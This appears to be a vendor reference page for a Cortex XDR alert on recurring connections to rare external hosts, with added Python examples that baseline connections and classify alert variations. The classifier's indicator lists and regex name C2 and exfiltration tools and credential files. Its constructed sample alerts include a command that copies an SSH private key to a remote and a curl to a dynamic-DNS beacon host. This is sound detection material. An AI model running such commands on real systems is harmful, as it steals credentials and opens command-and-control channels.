Uncommon recurring rare external host access

Cortex XDR Analytics Alert Reference by Alert name

Product
Cortex XDR
Last date published
2026-02-02
Category
Analytics Alert Reference
Index by
Alert name

Synopsis

Activation Period

14 Days

Training Period

30 Days

Test Period

N/A (single event)

Deduplication Period

14 Days

Required Data

  • Requires:
    • XDR Agent

Detection Modules

Detector Tags

Abnormal Communication Analytics

ATT&CK Tactic

ATT&CK Technique

Severity

Informational

Description

A process has established recurring connections to an external host that is uncommon for your organization (rarely or never seen during the training period).

Attacker's Goals

Establish a command-and-control channel to malware running on your network in order to control its activity, push updates to it, or take inventory of infected machines. The same channel can then be used to conduct discovery of the target environment or to exfiltrate sensitive data from compromised systems.

Investigative actions

  • Identify the process contacting the remote host, including its parent and causality chain and the command line that launched it, and determine whether the traffic is legitimate or malicious.
  • Look for other endpoints on your network that are also periodically contacting the same external host, and compare their connection timing with this endpoint's.
  • Inspect the domain or URL for malicious indicators and check whether it appears in threat intelligence feeds or reputation lists.
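The synopsis above gives the timing parameters but not how they combine. The Python below is an added example written for this page, not Cortex XDR code: it models the detection as a 30-day training baseline of which endpoints contact each external host, a recurrence count per (endpoint, process, host) in the detection period, and a 14-day deduplication window per key, and it implements the "other endpoints contacting the same host" pivot from the investigative actions. The record layout, the thresholds MIN_RECURRENCES, MAX_BASELINE_ENDPOINTS and PERIODIC_TOLERANCE, and the connection records are assumptions; the product's actual features and thresholds are not published on this page.

```python
"""
Added example, not Cortex XDR code: a simplified stand-alone model of the
"uncommon recurring rare external host access" logic over constructed
endpoint connection records. Field names, thresholds and the sample data
are assumptions chosen to illustrate the page's training and dedup periods.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import median

TRAINING_DAYS = 30           # page: Training Period is 30 days
DEDUP_DAYS = 14              # page: Deduplication Period is 14 days
MIN_RECURRENCES = 3          # assumption: connections needed to call access "recurring"
MAX_BASELINE_ENDPOINTS = 1   # assumption: a host contacted by more endpoints than this
                             # during training is "common" for the organization
PERIODIC_TOLERANCE = 0.5     # assumption: gaps within +/-50% of the median are periodic


def ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M")


# Constructed sample records: (time, endpoint, process, remote_host).
EVENTS = [
    # training period (Jan 1 - Jan 30): cdn.example.com is contacted org-wide
    (ts("2026-01-02 10:00"), "ws01", "chrome.exe", "cdn.example.com"),
    (ts("2026-01-03 10:00"), "ws02", "chrome.exe", "cdn.example.com"),
    (ts("2026-01-04 10:00"), "ws03", "chrome.exe", "cdn.example.com"),
    # detection period (Jan 31 onward)
    (ts("2026-01-31 10:00"), "ws01", "chrome.exe", "cdn.example.com"),
    (ts("2026-02-01 10:00"), "ws01", "chrome.exe", "cdn.example.com"),
    (ts("2026-02-02 10:00"), "ws01", "chrome.exe", "cdn.example.com"),
    (ts("2026-01-31 09:00"), "ws01", "updater.exe", "api.unknown-relay.example"),
    (ts("2026-01-31 21:00"), "ws01", "updater.exe", "api.unknown-relay.example"),
    (ts("2026-02-01 09:00"), "ws01", "updater.exe", "api.unknown-relay.example"),
    (ts("2026-02-01 21:00"), "ws01", "updater.exe", "api.unknown-relay.example"),
    (ts("2026-02-05 09:00"), "ws01", "updater.exe", "api.unknown-relay.example"),
    (ts("2026-02-02 09:00"), "ws04", "updater.exe", "api.unknown-relay.example"),
    (ts("2026-02-02 21:00"), "ws04", "updater.exe", "api.unknown-relay.example"),
    (ts("2026-02-03 09:00"), "ws04", "updater.exe", "api.unknown-relay.example"),
    (ts("2026-02-01 12:00"), "ws02", "python.exe", "tmp-host.example"),
]
TRAINING_START = ts("2026-01-01 00:00")
DETECTION_START = TRAINING_START + timedelta(days=TRAINING_DAYS)   # 2026-01-31


def baseline_endpoints(events, start, end):
    """Training phase: count distinct endpoints that contacted each remote host."""
    seen = defaultdict(set)
    for t, endpoint, _proc, host in events:
        if start <= t < end:
            seen[host].add(endpoint)
    return {host: len(eps) for host, eps in seen.items()}


def gaps(times):
    """Seconds between consecutive connections."""
    return [(b - a).total_seconds() for a, b in zip(times, times[1:])]


def is_periodic(times):
    """True when the gaps between connections cluster around one interval."""
    g = gaps(times)
    m = median(g)
    return m > 0 and all(abs(x - m) <= PERIODIC_TOLERANCE * m for x in g)


def detect(events, detection_start):
    """One alert per (endpoint, process, host) that recurs against an uncommon
    host; the same key is then silent for DEDUP_DAYS."""
    baseline = baseline_endpoints(
        events, detection_start - timedelta(days=TRAINING_DAYS), detection_start)
    history = defaultdict(list)   # key -> connection times since the last alert
    suppressed_until = {}         # key -> end of the deduplication window
    alerts = []
    for t, endpoint, proc, host in sorted(events):
        if t < detection_start:
            continue
        if baseline.get(host, 0) > MAX_BASELINE_ENDPOINTS:
            continue              # common host for the organization: out of scope
        key = (endpoint, proc, host)
        history[key].append(t)
        if len(history[key]) < MIN_RECURRENCES:
            continue              # not recurring yet
        if t < suppressed_until.get(key, t):
            continue              # already alerted within the deduplication period
        times = history[key]
        alerts.append({
            "time": t, "endpoint": endpoint, "process": proc, "host": host,
            "connections": len(times), "periodic": is_periodic(times),
            "median_gap_hours": median(gaps(times)) / 3600,
        })
        suppressed_until[key] = t + timedelta(days=DEDUP_DAYS)
        history[key] = []         # a fresh recurrence is needed after the window
    return alerts


def other_endpoints(events, host, since):
    """Investigative pivot: every endpoint that contacted the same host."""
    return sorted({e for t, e, _p, h in events if h == host and t >= since})


if __name__ == "__main__":
    for a in detect(EVENTS, DETECTION_START):
        print(a)
        print("  also contacted by:", other_endpoints(EVENTS, a["host"], DETECTION_START))
```

In the sample data the org-wide CDN never alerts despite recurring, the single contact to tmp-host.example never becomes recurring, and the fifth ws01 connection to the relay host falls inside the 14-day deduplication window, so only the two first-seen recurrences (one per endpoint) surface. The "periodic" flag and median gap are what you would compare across the endpoints returned by the pivot.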

Variations

Uncommon recurring rare external host access by an automated penetration testing tool

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

High

Description

A process identified as an automated penetration testing tool has established recurring connections to an uncommon external host.

Attacker's Goals

Establish a command-and-control channel to malware running on your network in order to control its activity, push updates to it, or take inventory of infected machines. The same channel can then be used to conduct discovery of the target environment or to exfiltrate sensitive data from compromised systems.

Investigative actions

  • Identify the process contacting the remote host, including its parent and causality chain and the command line that launched it, and determine whether the traffic is legitimate or malicious.
  • Confirm whether an authorized penetration test or red team engagement is in progress on this endpoint; if none is, treat the tool as attacker-operated.
  • Look for other endpoints on your network that are also periodically contacting the same external host, and compare their connection timing with this endpoint's.
  • Inspect the domain or URL for malicious indicators and check whether it appears in threat intelligence feeds or reputation lists.


Uncommon recurring rare external host access to a dynamic DNS domain

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

Low

Description

A process has established recurring connections to an uncommon external host under a dynamic DNS domain.

Attacker's Goals

Establish a command-and-control channel to malware running on your network in order to control its activity, push updates to it, or take inventory of infected machines. The same channel can then be used to conduct discovery of the target environment or to exfiltrate sensitive data from compromised systems.

Investigative actions

  • Identify the process contacting the remote host, including its parent and causality chain and the command line that launched it, and determine whether the traffic is legitimate or malicious.
  • Check which IP addresses the dynamic DNS name has resolved to over time; the operator of such a name can repoint it at will, so the name rather than the address is the durable indicator.
  • Look for other endpoints on your network that are also periodically contacting the same external host, and compare their connection timing with this endpoint's.
  • Inspect the domain or URL for malicious indicators and check whether it appears in threat intelligence feeds or reputation lists.


Uncommon recurring rare external host access initiated by a cron job

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

Low

Description

A process launched by a cron job has established recurring connections to an uncommon external host.

Attacker's Goals

Establish a command-and-control channel to malware running on your network in order to control its activity, push updates to it, or take inventory of infected machines. The same channel can then be used to conduct discovery of the target environment or to exfiltrate sensitive data from compromised systems.

Investigative actions

  • Identify the process contacting the remote host, including its parent and causality chain and the command line that launched it, and determine whether the traffic is legitimate or malicious.
  • Review the crontab entry that scheduled the process, the user it runs as, and when the entry was added or last modified.
  • Look for other endpoints on your network that are also periodically contacting the same external host, and compare their connection timing with this endpoint's.
  • Inspect the domain or URL for malicious indicators and check whether it appears in threat intelligence feeds or reputation lists.


Uncommon recurring rare external host access with a rare top-level domain

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

Low

Description

A process has established recurring connections to an uncommon external host with a rare top-level domain.

Attacker's Goals

Establish a command-and-control channel to malware running on your network in order to control its activity, push updates to it, or take inventory of infected machines. The same channel can then be used to conduct discovery of the target environment or to exfiltrate sensitive data from compromised systems.

Investigative actions

  • Identify the process contacting the remote host, including its parent and causality chain and the command line that launched it, and determine whether the traffic is legitimate or malicious.
  • Check whether any legitimate business application in your environment uses that top-level domain.
  • Look for other endpoints on your network that are also periodically contacting the same external host, and compare their connection timing with this endpoint's.
  • Inspect the domain or URL for malicious indicators and check whether it appears in threat intelligence feeds or reputation lists.


Uncommon recurring rare external host access using an exfiltration tool

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

Low

Description

A process identified as a data exfiltration tool has established recurring connections to an uncommon external host.

Attacker's Goals

Establish a command-and-control channel to malware running on your network in order to control its activity, push updates to it, or take inventory of infected machines. The same channel can then be used to conduct discovery of the target environment or to exfiltrate sensitive data from compromised systems.

Investigative actions

  • Identify the process contacting the remote host, including its parent and causality chain and the command line that launched it, and determine whether the traffic is legitimate or malicious.
  • Review the tool's command line and the volume of data sent to the remote host to determine which files or directories were transferred.
  • Look for other endpoints on your network that are also periodically contacting the same external host, and compare their connection timing with this endpoint's.
  • Inspect the domain or URL for malicious indicators and check whether it appears in threat intelligence feeds or reputation lists.


Uncommon recurring rare external host access with a sensitive file in actor or causality command line

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

Low

Description

A process has established recurring connections to an uncommon external host, and a sensitive file is referenced in the actor or causality command line.

Attacker's Goals

Establish a command-and-control channel to malware running on your network in order to control its activity, push updates to it, or take inventory of infected machines. The same channel can then be used to conduct discovery of the target environment or to exfiltrate sensitive data from compromised systems.

Investigative actions

  • Identify the process contacting the remote host, including its parent and causality chain and the command line that launched it, and determine whether the traffic is legitimate or malicious.
  • Review the actor and causality command lines to identify the sensitive file referenced, and determine whether its contents were sent to the remote host.
  • Look for other endpoints on your network that are also periodically contacting the same external host, and compare their connection timing with this endpoint's.
  • Inspect the domain or URL for malicious indicators and check whether it appears in threat intelligence feeds or reputation lists.
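The variations above share one base description and differ only in the condition that changes the severity. The Python below is an added example, not Cortex XDR code, that maps an already-raised alert onto those variation conditions and reports the highest matching severity. The indicator lists (PENTEST_TOOLS, EXFIL_TOOLS, DYNAMIC_DNS_SUFFIXES, CRON_PARENTS), the sensitive-file regex, the RARE_TLD_MAX_COUNT threshold, the record field names and the sample alerts are all assumptions for illustration; the product's own feature logic is not published on this page.

```python
"""
Added example, not Cortex XDR code: map an already-raised alert onto the
variations listed on this page and take the highest severity among those
that match. Indicator lists, regexes, field names and sample alerts are
assumptions for illustration.
"""
import re

# Page severities; "Medium" exists in Cortex XDR but no variation here uses it.
SEVERITY_RANK = {"Informational": 0, "Low": 1, "Medium": 2, "High": 3}

# Assumed indicator lists (illustrative, not the product's own):
PENTEST_TOOLS = {"msfconsole", "sliver-client", "cobaltstrike"}
EXFIL_TOOLS = {"rclone", "megasync", "dnscat2"}
DYNAMIC_DNS_SUFFIXES = ("duckdns.org", "no-ip.org", "dyndns.org", "hopto.org")
CRON_PARENTS = {"cron", "crond", "anacron"}
SENSITIVE_FILE_RE = re.compile(
    r"(id_rsa|id_ed25519|\.kdbx|ntds\.dit|/etc/shadow|\.pem|\.pfx|wallet\.dat)", re.I)
RARE_TLD_MAX_COUNT = 5   # assumption: a TLD seen fewer times than this in training is rare
IPV4_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")

BASE_TITLE = "Uncommon recurring rare external host access"


def variations(alert, tld_counts):
    """Return [(variation suffix, severity)] for every variation the alert matches."""
    proc = alert["process"].lower()
    host = alert["host"].lower().rstrip(".")
    cmd = " ".join((alert.get("actor_cmdline", ""), alert.get("causality_cmdline", "")))
    found = []
    if proc in PENTEST_TOOLS:
        found.append(("by an automated penetration testing tool", "High"))
    if any(host == s or host.endswith("." + s) for s in DYNAMIC_DNS_SUFFIXES):
        found.append(("to a dynamic DNS domain", "Low"))
    if alert.get("parent_process", "").lower() in CRON_PARENTS:
        found.append(("initiated by a cron job", "Low"))
    if not IPV4_RE.match(host):                      # IP literals have no TLD
        tld = host.rsplit(".", 1)[-1]
        if tld_counts.get(tld, 0) < RARE_TLD_MAX_COUNT:
            found.append(("with a rare top-level domain", "Low"))
    if proc in EXFIL_TOOLS:
        found.append(("using an exfiltration tool", "Low"))
    if SENSITIVE_FILE_RE.search(cmd):
        found.append(("with a sensitive file in actor or causality command line", "Low"))
    return found


def classify(alert, tld_counts):
    """Alert title, severity and matched variations; severity is the highest
    among the matched variations, Informational when none matches."""
    found = variations(alert, tld_counts)
    if not found:
        return {"title": BASE_TITLE, "severity": "Informational", "variations": []}
    top = max(found, key=lambda v: SEVERITY_RANK[v[1]])
    return {"title": f"{BASE_TITLE} {top[0]}", "severity": top[1],
            "variations": [v[0] for v in found]}


# Constructed TLD frequencies from a training period, and constructed alerts.
TLD_COUNTS = {"com": 1200, "net": 300, "org": 150, "example": 50, "xyz": 2}
SAMPLE_ALERTS = [
    {"process": "sliver-client", "parent_process": "bash", "host": "ops.example",
     "actor_cmdline": "sliver-client"},
    {"process": "curl", "parent_process": "crond", "host": "beacon.duckdns.org",
     "actor_cmdline": "curl -s https://beacon.duckdns.org/x"},
    {"process": "rclone", "parent_process": "bash", "host": "store.xyz",
     "actor_cmdline": "rclone copy /root/.ssh/id_rsa remote:bkp"},
    {"process": "updater.exe", "parent_process": "services.exe",
     "host": "api.unknown-relay.example", "actor_cmdline": "updater.exe /check"},
    {"process": "powershell.exe", "parent_process": "explorer.exe",
     "host": "203.0.113.7", "actor_cmdline": "powershell.exe -nop -w hidden"},
]

if __name__ == "__main__":
    for a in SAMPLE_ALERTS:
        print(classify(a, TLD_COUNTS))
```

Several variations can match one alert (the rclone sample hits the exfiltration tool, rare TLD and sensitive file conditions at once); the severity reported is the maximum, which is why only the penetration testing tool variation lifts an alert to High while every other combination stays at Low.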